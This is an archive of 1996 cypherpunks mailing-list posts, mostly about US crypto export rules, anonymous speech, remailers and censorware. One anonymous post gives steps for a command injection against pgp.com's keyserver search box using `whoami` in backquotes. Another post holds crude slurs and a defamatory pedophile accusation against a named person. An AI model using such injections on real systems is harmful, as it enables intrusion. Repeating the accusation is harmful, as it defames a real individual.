> This is a big question for me.  How does the fact that the same exact
> information, when stored on magnetic media, cause it to lose its
> freedom of press protection?

You must understand that the USG faces a VERY big hurtle in
attempting to ban the book. Books have a history; one as old as the
Founding Fathers, older than the country and the Constitution, of
being protected.

In fact, this extends to other printed material; i.e newspapers.
They tried and failed to get "prior restraint" in the Pentagon
Papers case.

But in their quest to sandbag an already submerged dike, they hope
they can draw a line at magnetic media. It's untested, IMHO likely
to fail, but it's a hell of a lot better than trying to ban books.
They'd get laughed out of court.


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: IQ Mailer <80160@data.iq-internet.com>
Date: Sun, 29 Dec 1996 22:46:40 -0800 (PST)
Subject: PROTECT YOUR FAMILY
Message-ID: <199612300652.XAA28455@data.iq-internet.com>
MIME-Version: 1.0
Content-Type: text/plain


*+*+ This message is provided under the strict C.A.R.E. Code of Ethics.  
(Conscientious Advertising through Responsible E-mail).  
You can view the code at: iq-internet.com/care.html


PROTECT YOUR FAMILY

My LIFECARD does exactly that.  You or any member of your famil will have
instant worldwide access to a wide range of potentially life saving medical
and personal information in case of an emergency.

SAFETY

                SECURITY
                           
                                  PEACE OF MIND

MYLIFECARD was the first TRUE medical emergency information card and is STILL
the state of the art.  You spend THOUSANDS
of dollars a year to protect your family's health.  You owe it to your family
to spend a few pennies a day for MYLIFECARD.

DON'T DELAY!!!!!  FOR MORE INFORMATION:
Type in the word INFORMATION in the body of your message and hit reply.




*+*+ To REMOVE your name from our list
*+*+ reply with NO MAIL in the subject line.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 29 Dec 1996 22:00:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: New crypto regs outlaw financing non-US development
In-Reply-To: <v03007801aeecc5d07561@[207.167.93.63]>
Message-ID: <6eHqZD21w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Timothy C. May" <tcmay@got.net> writes:

> This fascist move by the U.S. government is a huge threat to our liberty.
> It may be time to simply give up on communicating with these assholes and
> give them the treatment they have earned.

I said it recently on another forum: U.S. today reminds me not of Nazi
Germany (which would have existed for hundreds of years if it hadn't
foolishly attacked more neighbors than it could fight at the same time),
but of the former Soviet Union under late Brezhnev, Chernenko, and
Andropov. Nothing needs to be done; just wait for it to collapse and
try not to get hit by the falling debris. :-)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Mon, 30 Dec 1996 00:00:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Export proposal
In-Reply-To: <32cc13c3.83442324@kdn0.attnet.or.jp>
Message-ID: <v03007801aeed263a0b01@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:02 PM -0800 12/29/96, Huge Cajones Remailer wrote:

>What this means is that the government is afraid that a ban on printed
>material would be considerably more difficult to uphold in court.
>It's far easier for them to argue that a floppy disk is a mechinism
>presenting a clear and present danger than it would be to argue the
>same for a book.
>
>So why don't we take this debate where the Government least wants to
>fight it--the realm of printed matter.  Someone should start a crypto
>export business that takes crypto source code, prints it, and mails it
>overseas where someone else scans the source code and deliveres it in
>electronic form to a recipient.

Ah, but the clause which says:

>>    (7) General Prohibition Seven--Support of Certain Activities by
>>U.S. persons--(i) Support of Proliferation Activities (U.S. Person
>>Proliferation Activity). If you are a U.S. Person as that term is
>>defined in Sec. 744.6(c) of the EAR, you may not engage in any
>>activities prohibited by Sec. 744.6 (a) or (b) of the EAR which
>>prohibits the performance, without a license from BXA, of certain
>>financing, contracting, service, support, transportation, freight
>>forwarding, or employment that you know will assist in certain
>>proliferation activities described further in part 744 of the EAR.

would appear to make such a "conspiracy" itself a crime, regardless of
First Amendment issues. This is why this new law is so pernicious: it
declares a broad class of behaviors (contracting, support, financing, etc.)
to be criminal acts.

And "prior restraint" isn't even really needed...all they have to do is to
prosecute those who provide aid and comfort to the enemy, _after_ the
publication, and the effect will be to suppress further such publications
of code.

(Note of course that the government does not practice prior restraint as a
means of stopping spies and traitors, generally. Nor are such acts of
treason or espionage protected on First Amendment grounds....I see no
reason to expect that publication of crypto code would be treated much
differently, should this new crypto law be upheld.)

--Tim May

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 29 Dec 1996 22:00:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Untraceable Payments, Extortion, and Other Bad Things
In-Reply-To: <v03007802aeecadd300ea@[207.167.93.63]>
Message-ID: <moHqZD22w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Timmy May <tcmay@got.net> farts:

> By the way, I was gone last week, and missed some of the follow-ups to this
> thread. I did notice in Omegaman's replies that he was replying to
> Detwweiler's wailings about "Timmy." (What's with Detweiler and Vulis both
> being so hung up on such a nickname? If it makes them feel they're winning
> converts, let them call me "Timmy." Jeesh.)

Tiny Timmy's use of the word "hung" indicates that he has a very small penis.

Does the pedophile cocksucker John Gilmore perfer small penises in his mouth?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gt@kdn0.attnet.or.jp (Gemini Thunder)
Date: Sun, 29 Dec 1996 17:06:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: New crypto regulations
Message-ID: <32cc13c3.83442324@kdn0.attnet.or.jp>
MIME-Version: 1.0
Content-Type: text/plain


Concerning the new crypto regulations:

" Note to paragraphs (b)(2) and (b)(3) of this section: A printed
book or other printed material setting forth encryption source code
is not itself subject to the EAR (see Sec. 734.3(b)(2)). However,
notwithstanding Sec. 734.3(b)(2), encryption source code in
electronic form or media (e.g., computer diskette or CD ROM) remains
subject to the EAR (see Sec. 734.3(b)(3))."

This is a big question for me.  How does the fact that the same exact
information, when stored on magnetic media, cause it to lose its
freedom of press protection?

Has magnetic media never been tested in court for freedom of press
applicability?  What are the laws that outline the differences between
magnetic media and printed media?  Specifically, the one(s) that
permit the non-protection of magnetic media?

Does this mean that if a journal published an article on some strong
non-key escrow encryption algorithm that included source code, it
could not later offer that same article on a CD-ROM collection?  or
provide that same source code online?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Mon, 30 Dec 1996 01:09:33 -0800 (PST)
To: sameer <sameer@c2.net>
Subject: Re: Export proposal
Message-ID: <3.0.32.19961230010938.006bca68@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:24 PM 12/29/96 -0800, sameer wrote:
[...]
>	Stewart Baker has been quoted as saying that banned "easily
>scanned printed texts" isn't far away. (Rebecca Vesely's Wired News
>article) 

The language of the new regulations supports this view. It seems to me that
the USG wanted to ban easily scannable text, but wasn't sure how to best
define "easily scannable". This is a property that is difficult to define.
Once they come up with a workable definition, expect the regs to be amended.

>We are now just one step away from non-GAK crypto being
>illegal in the US. 

As Michael Froomkin has noted, this will require an act of Congress. I
expect the administration to send a pro-GAK bill to Congress in 1997.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
   Make your mark in the history of mathematics. Use the spare cycles of
   your PC/PPC/UNIX box to help find a new prime.
   http://www.mersenne.org/prime.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jt@freenix.fr (--Jerome Thorel--)
Date: Sun, 29 Dec 1996 17:14:49 -0800 (PST)
To: thorel@netpress.fr
Subject: lambda 2.13 - Parental control abuses and Crypto leaks
Message-ID: <v01510103aeeccbd052b5@[194.117.206.35]>
MIME-Version: 1.0
Content-Type: text/plain


lambda 2.13 contents ...

* Parental control abuses
* Crypto Soap Opera : new leaked documents in France and at the OECD
* Short-circuits :
- U2's hacked: Big Lie in Cyberspace
- Serbia's fight for democracy reach digital age
- Radikal censorship

(sorry for langage mistakes, the text has not been reviewed by an English
third party)

*       *       *       *       *
Peacefire vs Cybersitter
Parental control abuses
*       *       *       *       *

An insider quarrel between blocking-software CyberSitter and one of the Web
site blocked has emerged recently. A US youth association against Net
censorship, Peacefire (wwww.peacefire.org), claimed on December 7 :
"Sometime today or yesterday, CYBERsitter put www.Peacefire.org on its list
of blocked sites. Next time users of the program update their "filter
file", they will see our web page blocked along with Playboy.com,
Penthouse.com etc. (not to mention NOW.org, Members.GNN.com, and C2.org).
Apparently, the company president read our page about CYBERsitter at:
http://www.peacefire.org/censorware/CYBERsitter.html and didn't like it."

Solid Oak Software (www.solidoak.com), owner of the blocking program,
claims Peacefire put online some advices or tips to abort CyberSitter
efficiency for teenagers; claimed one time of "copyright infringements";
and decided to urge Peacefire's IAP to block its account.

Remember that these softwares were designed to allow parents to control
their child's access to the Internet. "Parental control", as it is called,
was suppose to give ways for parents to self-censor Internet content. But
when people trust the technology and give too much faith to black-listed
sites maintained by other individuals' moral standards, parents don't
really keep on their "parental control" anymore. They even fail to tackle
their own responsability towards their childs.

On December 27 the CPSR (www.cpsr.org) wrote a protest letter to Solid Oak.
Abstracts: "Your own description of your product provides a fairly concise
description of CYBERSitter's restrictions: "any site that focuses on topics
such as adult or issues, illegal activities, bigotry, racism, drugs or
pornography". Using this list", the CPSR went on, "any determined
individuals with web browsers might easily build a profile of sites that
are blocked by CYBERSitter. Several members of our group dowloaded your
demo, and quickly verified that your software completely or partially
blocks access to sites such as the National Organization of Women
(http://www.now.org), and the Yahoo search engine (http://www.yahoo.com).
Since CYBERSitter's behavior can be easily categorized, Peacefire's
publishing of a list of blocked sites does not justify blocking Peacefire's
site, or any similar unsavory activities. ... By blocking sites that focus
on topics such as [sex] and drug use, SolidOak may filter potentially
educational materials regarding AIDS and drug abuse prevention."

As Haselton wrote later, "Most letters to the president, Brian Milburn, at
bmilburn@solidoak.com, or to their support staff at support@solidoak.com,
are now being bounced with the message, "this account has been configured
to reject all messages on this topic..." i would guess that their mail
software at those accounts is rejecting all messages with the word
"Peacefire" in the subject line, so remember to leave it out if you decide
to write to them about this. (And thanks for your support if you do!)"

P.S.- The European Commission has submitted draft guidelines to member
States concerning the Internet's content regulations. They were quite
reserved about the real efficacy of content control specifications like
PICS, but nonetheless approved it:
http://www.echo.lu/best_use/best_use.html

*       *       *       *       *
French Crypto Sop Opera :
other leaked documents
*       *       *       *       *

If you're an encryption addict and fluent in French, jump to the document
published by Planete Internet magazine :
http://www.planete-internet.com/crypto/decret

It is a draft decree prepared by the SCSSI, the security agency, which
draws a preliminary picture of future French "trusted third party" agencies
(TTPs), or "key recovery agents".

A brief summary of what the French electronic notary will look like:

The government - The SCSSI
* Will say which encryption product will be concerned; all crypto systems
will be OK if a key recovery scheme is scheduled; (PGP and the like are not
on the list of "approved" products);
* Will decide which firm is OK to become a TTP; but no justification will
be needed for negative requests;

The TTP, "le notaire"
* All commercial firms or entities (SA, SARL, consortiums...) will be concerned;
* But all its members, CEOs or associates must be "French": like the
majority of its finantial assets;
* Will be submitted to "professionnal secret" and obliged to keep third
party encryption keys away from illegal wiretapping activities;

The (commercial) user
* Will be obliged to use authorised encryption products;
* Will engage itself to fully cooperate with the TTP;

The (basic) user
* Even if the sheme will not be mandatory, using encryption without the
backing of a TTP will be considered illegal;
* Huge finantial and logistical procedures will discourage NGO's, small
companies and the citizen to protect legally its electronic communications.

The new and fully complete policy is scheduled in France in the comming weeks.

*       *       *       *       *
PS - Leaked document from the OECD's crypto hearings
Australians cryptographers at
http://www.ozemail.com.au/~firstpr/crypto/oecd_dr2.htm published the draft
paper that were on the agenda of the Dec. 16-20 closed-door meeting in
Paris, revealing the broad and detailed policy toward an international
cooperation for "lawfull access" to encrypted communications.

*       *       *
Short-circuits
*       *       *

U2 hacked? Big Lie in Cyberspace
---------------
You surely read numerous stories about the U2 rock band that were "robbed"
in Cyberspace by hackers that traveled through cables of a digital camera
that broadcasted on the Internet views of their Dublin studio. Hackers put
2 new songs online from a site in Hungary, the story went on. Strange
hacking, hey??! The story, which broke in the London's Sunday Times on
November 17 (follomed by a naive Le Monde in Paris) was just dope -- a
fake, phoney and bull story.

Read, for example, what a fan from the Nederland says ->
www.universal.nl/users/mirrorbal/u2.htm
Number 1 : he told the real story to the Times which didn't even publish a
word of it. What's the story? A videotape with 45 sec abstracts from both
songs were released by Island Records-Hungary in November (it was the
scheduled date for U2's upcomming album, but now scheduled in March!). And
a guy simply put a microphone besides his TV and put the digital stuff
online. Where's the hack?
The Hungarian explains also the story, but didn't erase the songs from his
server: w3.datanet.hu/~karpati/


Serbia's fight for democracy reach digital age
---------------
Read David S. Bennahum's last MEME bulletin about Serbia's democratric
fight: http://www.reach.com/matrix/. Bennahum spent one week in Belgrade
and met democrats willign to create cyber-rights organisations like the
EPIC or the CDT.
Follow their fight daily on the Internet :
http://eurasianews.com/erc/serbopp1.htm

Radikal censorship
---------------
A magazine banned in Germany, the leftist Radikal, available online in the
Nederlands, was the target of German policemen on Dec. 11. After failing to
urge Nederlands authorities to block the Web site last September, German
police decided to act as usually, with the help of their Dutch counterpart
and raided a house in Vaals. It turns out that they acted to block Radikal
at the source : its paper version.
Read the news on:
http://www.xs4all.nl/~tank/radikal
http://www.xs4all.nl/~felipe/germany.html

*               *               *               *
lambda 2.13 - www.freenix.fr/netizen
*               *               *               *


Jerome Thorel =-= Journaliste / Reporter =-= Paris, France
lambda bulletin =-= Planete Internet Editor






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Secret Squirrel <nobody@squirrel.owl.de>
Date: Sun, 29 Dec 1996 19:33:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: HOW TO HACK www.pgp.com -- stupid CGI script xploit
Message-ID: <19961230033149.11419.qmail@squirrel.owl.de>
MIME-Version: 1.0
Content-Type: text/plain


Go to www.pgp.com

Go To "Keyserver"

Go To "Query"

In the search window, type `whoami` (note the back quotes).

Watch for result.

How stupid.

Seems to be a common problem of cgi scripts.
      
like the one in norway...

xaxaxa




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Mon, 30 Dec 1996 05:00:26 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Legality of ...? More Dale
Message-ID: <199612301300.FAA29520@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Dec 1996, Dale Thorn wrote:

>When my dad ran a bread truck in the 1950's, a mafia character who >had a bad day paid him $20 or so in pennies, and my dad said he took >it with little argument.

Dale, you must serve some purpose in my life. Perhaps it is to teach me humility.

I strive to understand your purpose. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: amp@pobox.com
Date: Mon, 30 Dec 1996 03:21:37 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: "Structuring" of Communications a Felony?
In-Reply-To: <v03007800aeec96b09112@[207.167.93.63]>
Message-ID: <Chameleon.851944760.amp@tx86-8>
MIME-Version: 1.0
Content-Type: text/plain



> As to the "anonymous speech" rulings, I mainly know of the 1956 Georgia
> case, in which the Supremes struck down a law requiring that leaflets
> handed out have a name attached. I don't know of more recent rulings,
> especially ones related to the Internet.
> 
> (Why this is important is that the Supreme Court has often differentiated
> between types of speech. For example, ask a liquor or tobacco company if it
> has "freedom of speech." Ask those who put labels on their products if they
> have freedom of speech--the Federal Trade Commission, Food and Drug
> Administration, etc., declare what may not be said, what must be said, etc.
> First Amendment scholars are of course well aware that the First is not
> treated as an absolute.)
=snip=

you might want to check out ...

McINTYRE, executor of ESTATE OF McINTYRE,
DECEASED v. OHIO ELECTIONS COMMISSION
certiorari to the supreme court of ohio
No. 93-986.   Argued October 12, 1994-Decided April 19, 1995


which can be found at 
ftp://ftp.cwru.edu/hermes/ascii/93-986.ZS.filt   --- syllabus
ftp://ftp.cwru.edu/hermes/ascii/93-986.ZO.filt   --- opinion
ftp://ftp.cwru.edu/hermes/ascii/93-986.ZC.filt   --- concurring
ftp://ftp.cwru.edu/hermes/ascii/93-986.ZC1.filt  --- concurring
ftp://ftp.cwru.edu/hermes/ascii/93-986.ZD.filt   --- dissenting


a snippet from the synopsis...

After petitioner's decedent distributed leaflets purporting to express
 the views of ``CONCERNED PARENTS AND TAX PAYERS'' oppos-
 ing a proposed school tax levy, she was fined by respondent for
 violating 3599.09(A) of the Ohio Code, which prohibits the distribu-
 tion of campaign literature that does not contain the name and
 address of the person or campaign official issuing the literature. 
 The Court of Common Pleas reversed, but the Ohio Court of Ap-
 peals reinstated the fine.  In affirming, the State Supreme Court
 held that the burdens 3599.09(A) imposed on voters' First Amend-
 ment rights were ``reasonable'' and ``nondiscriminatory'' and therefore
 valid.  Declaring that 3599.09(A) is intended to identify persons
 who distribute campaign materials containing fraud, libel, or false
 advertising and to provide voters with a mechanism for evaluating
 such materials, the court distinguished Talley v. California, 362
 U. S. 60, in which this Court invalidated an ordinance prohibiting
 all anonymous leafletting. 




------------------------
Name: amp
E-mail: amp@pobox.com
Date: 12/30/96
Time: 05:11:23
Visit http://www.public-action.com/SkyWriter/WacoMuseum

EARTH FIRST! We'll strip mine the other planets later.
------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sun, 29 Dec 1996 21:27:07 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: Legality of requiring credit cards?
In-Reply-To: <32C737C9.6760@gte.net>
Message-ID: <Pine.LNX.3.95.961230052303.354A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 29 Dec 1996, Dale Thorn wrote:

> David Wagner wrote:
[...]
> Several (or most) states threaten their drivers in the license literature
> that if they're caught driving without possession of the license (even
> though the person so caught has a valid license somewhere), they can be
> jailed as a criminal.  If there are any cases where this has been tested,
> I'd like to hear about them.

I've heard about such cases, and in fact North Carolina (where I am)
"requires" all drivers to have their card on their person while driving.
A friend of mine was pulled without his, and they gave him 30 days to
produce it, and finally agreed just to look it up on the computer when he
produced 2 other valid forms of ID.  But then again, in North Carolina the
family Bible is a valid form of ID (as well as a completed work
_application_, and other odities).

 --Deviant
   PGP KeyID = E820F015 Fingerprint = 3D6AAB628E3DFAA9 F7D35736ABC56D39

They seem to have learned the habit of cowering before authority even when
not actually threatened.  How very nice for authority.  I decided not to
learn this particular lesson.
                -- Richard Stallman


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMsdSYDCdEh3oIPAVAQEP+Af7BHDT43r700Q1lb2Ioc2RjfS9+eDIxtLn
f+bhWqsk3YpIpCVenYHr23PzSvnHBIztHpNMM0HEsFRZOHzQjuQ9QSEOzBgehmon
P4wJURbQIH4lIpcH4VQUFfHuU/yT5ZPaSGrNvXYnEIyZFRyvu5XnZyynKes344/v
TmQ7Wj5KIiYtmp7AJ+QIEJuCeGVJaSNbjj2ibmMyHf3tyhk7nQjtiWmGSYx0Dq8H
6hKrRLI4QzqKnsAYwrWFO9MZBXQGgLm5CGZAVgexr73AtfcTJyBLio+kaFQBws7e
VkPtZzCo3o+jGbu5XLt4TJoLgr5BMIL6cxDGmbCko9ALzzYfMixJJA==
=/IRS
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@tivoli.com>
Date: Mon, 30 Dec 1996 04:25:22 -0800 (PST)
To: solman@MIT.EDU
Subject: Re: New crypto regulations
In-Reply-To: <9612300237.AA17923@ua.MIT.EDU>
Message-ID: <32C7B497.8C2@tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


solman@MIT.EDU wrote:
> 
> The government's claim is that in the interests of national security,
> export of cryptography must be prevented. By limiting the policy's
> applicability to media which are in, or can easily be converted to,
> electronic form ...

Does anybody seriously believe that nbody writing these policies has
an understanding of OCR software?  An on-line form of code printed
in a book is just a quick trip to a scanner away.  They know that.

-- 
^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^
Mike McNally -- Egregiously Pointy -- Tivoli Systems, "IBM" -- Austin
mailto:m5@tivoli.com    mailto:m101@io.com    http://www.io.com/~m101
^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 30 Dec 1996 03:33:07 -0800 (PST)
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: "Structuring" of Communications a Felony?
Message-ID: <3.0.1.32.19961230062451.00bbb6b4@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:08 PM 12/29/96 -0800, Timothy C. May wrote:
>As to the "anonymous speech" rulings, I mainly know of the 1956 Georgia
>case, in which the Supremes struck down a law requiring that leaflets
>handed out have a name attached. I don't know of more recent rulings,
>especially ones related to the Internet.

This was upheld by another recent case involving an anonymous pamphlet from
an Ohio woman.

>If origin-labelling is unconstitutional, as Steve claims, then on what
>basis can the U.S. Postal Service require identification for packages over
>one pound? Surely what is inside the package may be considered "speech" (by
>those interested in pushing the point).

The new rule doesn't require that ID be presented at the Post Office.  You
just  have to present the package in person and fill out a form.  They
could try and require ID later, of course.

>And there are many other situations where anonymity is no longer allowed,
>where once it was. The gambling example Brian Davis brought up is an
>example: for the purposes of tax collection, regulation of gambling, etc.,
>winners of nontrivial amounts must identify themselves.

They have to identify themselves they don't have to present identification
(an important distinction).  Brian also pointed out that the guy could have
avoided the problem if he'd been smarter.

>1. A sharp increase in spamming, mass mailing, threatening letters,
>etc....sort of like the "denial of service" and spamming/looping attacks
>seen here on Cypherpunks, and being seen widely on the Net. This will
>increase pressure to "do something about it." A Senator Exon type person
>will introduce legislation to require e-mail be labelled.

If they have yet to successfully mandate positive ID for bank or credit
accounts, how can they expect to successfully mandate positive ID for
something as ephemeral as an Email account?

>In closing, I think the Supreme Court will, when it eventually agrees to
>hear a relevant case, will differentiate between protected anonymous speech
>in public forums and the labelling of sealed packages, sealed letters, and
>sealed e-mail. They will argue along the lines of saying that the labelling
>law is for the protection of society and not for tracking down dissidents.
>The effect will of course be the same, but this will be the fig leaf which
>allows them to uphold such laws.

Though they have not done so over the several centuries we've had anonymous
postal mail.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 30 Dec 1996 03:32:45 -0800 (PST)
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: "Structuring" of Communications a Felony?
Message-ID: <3.0.1.32.19961230063201.00bc5b0c@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:11 PM 12/29/96 -0800, Timothy C. May wrote:
>
>For example, while citizen-units in the United States are free to move to
>new locales without permission and without registration, unlike in some
>countries, the tax collector expects a valid home (or at least mailing)
>address on tax returns. 

There is no requirement that you list a home address just as there is no
requirement that you have a home.  A mailing address anywhere on earth is
sufficient for tax purposes.  The form *says* home address but no one's
done any time for not putting one on the form (right Brian).  Proving that
you had another home than the one listed on the date you filled out the
form is beyond the capability of even the federal government.  The
instructions even say "use P.O. Box only if the Post Office doesn't deliver
mail to your home" but don't say anything about mail receiving services and
so forth.  If you know how, you can even wander into most rural post
offices and get a P.O. box in an area that doesn't have home delivery
without living in the vicinity or proving it.  Addresses are much too
slippery things to control very well with the US model.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lurker" <lurker@mail.tcbi.com>
Date: Mon, 30 Dec 1996 04:40:57 -0800 (PST)
To: Jazzmin Belle Sommers <cypherpunks@toad.com
Subject: Re: ssn hack
Message-ID: <3.0.32.19961229161745.0068f300@mail.tcbi.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:10 PM 12/28/96 -0600, Jazzmin Belle Sommers wrote:
>
>I still find that the best line of defense regarding privacy is a complete
>second identity.  Does anyone know how to apply for proper papers (taxpayer
>ID#, checking account, picture ID of some sort) for a second identity?  As
>far as I know, it is not illegal to have one, as long as it is not used for
>fraud.  I'm an artist, yeah, that's it.
>

I'm not sure that you can go through such a procedure to attain a legal
"alias"; but on the other hand why the hell would you want to?

Think about it, if you will paper work with an institutions to attain an
alias you would have to give them in formation about you identity.  Short
of commiting fraud by giving false informaiton do you think that you have
really gain any privacy?  Anyone can still find out who you are.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 30 Dec 1996 06:53:02 -0800 (PST)
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199612301450.GAA05211@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@miron.vip.best.com> cpunk pgp special";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'nymrod'} = '<nymrod@nym.jpunix.com> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk mix pgp hash latent cut ek";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"haystack"} = "<haystack@holy.cow.net> cpunk mix pgp hash latent cut ek";
$remailer{"lucifer"} = "<lucifer@dhp.com> cpunk mix pgp hash latent cut ek";
$remailer{"jam"} = "<remailer@cypherpunks.ca> cpunk mix pgp hash latent cut ek";
$remailer{"winsock"} = "<winsock@rigel.cyberpass.net> cpunk pgp pgponly hash cut ksub reord";
$remailer{'nym'} = '<config@nym.alias.net> newnym pgp';
$remailer{"balls"} = "<remailer@huge.cajones.com> cpunk pgp hash latent cut ek";
$remailer{"squirrel"} = "<mix@squirrel.owl.de> cpunk mix pgp pgponly hash latent cut ek";
$remailer{"middle"} = "<middleman@jpunix.com> cpunk mix pgp hash middle latent cut ek reord ?";
$remailer{'cyber'} = '<alias@alias.cyberpass.net> alpha pgp';
$remailer{"dustbin"} = "<dustman@athensnet.com> cpunk pgp hash latent cut ek mix reord middle ?";
$remailer{'weasel'} = '<config@weasel.owl.de> newnym pgp';
$remailer{"death"} = "<x@deathsdoor.com> cpunk pgp hash latent post";
$remailer{"reno"} = "<middleman@cyberpass.net> cpunk mix pgp hash middle latent cut ek reord ?";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.
remailer@crynwr.com is _not_ a remailer.

There is no remailer at relay.com.

Groups of remailers sharing a machine or operator:
(cyber mix)
(weasel squirrel)

The alpha and nymrod nymservers are down due to abuse. However, you
can use the nym or weasel (newnym style) nymservers.

The cyber nymserver is quite reliable for outgoing mail (which is
what's measured here), but is exhibiting serious reliability problems
for incoming mail.

The squirrel and winsock remailers accept PGP encrypted mail only.

403 Permission denied errors have been caused by a flaky disk on the
Berkeley WWW server. This seems to be fixed now.

The penet remailer is closed.

Last update: Mon 30 Dec 96 6:48:57 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
haystack haystack@holy.cow.net                 +#*#+#+     1:44  99.99%
weasel   config@weasel.owl.de                  +++++++  1:06:00  99.99%
lucifer  lucifer@dhp.com                       +++++++    33:39  99.98%
mix      mixmaster@remail.obscura.com          -++++++  1:11:39  99.98%
nym      config@nym.alias.net                  *##*###      :19  99.97%
reno     middleman@cyberpass.net               ------+  1:37:49  99.97%
squirrel mix@squirrel.owl.de                   ++++++   1:06:32  99.96%
middle   middleman@jpunix.com                  ------   2:20:53  99.86%
dustbin  dustman@athensnet.com                 _ .-*+* 17:45:40  99.70%
balls    remailer@huge.cajones.com             **** +*     8:06  99.55%
cyber    alias@alias.cyberpass.net              * **+*    29:35  99.50%
exon     remailer@remailer.nl.com              *##** *     1:02  99.43%
replay   remailer@replay.com                   * -** +  1:13:13  98.96%
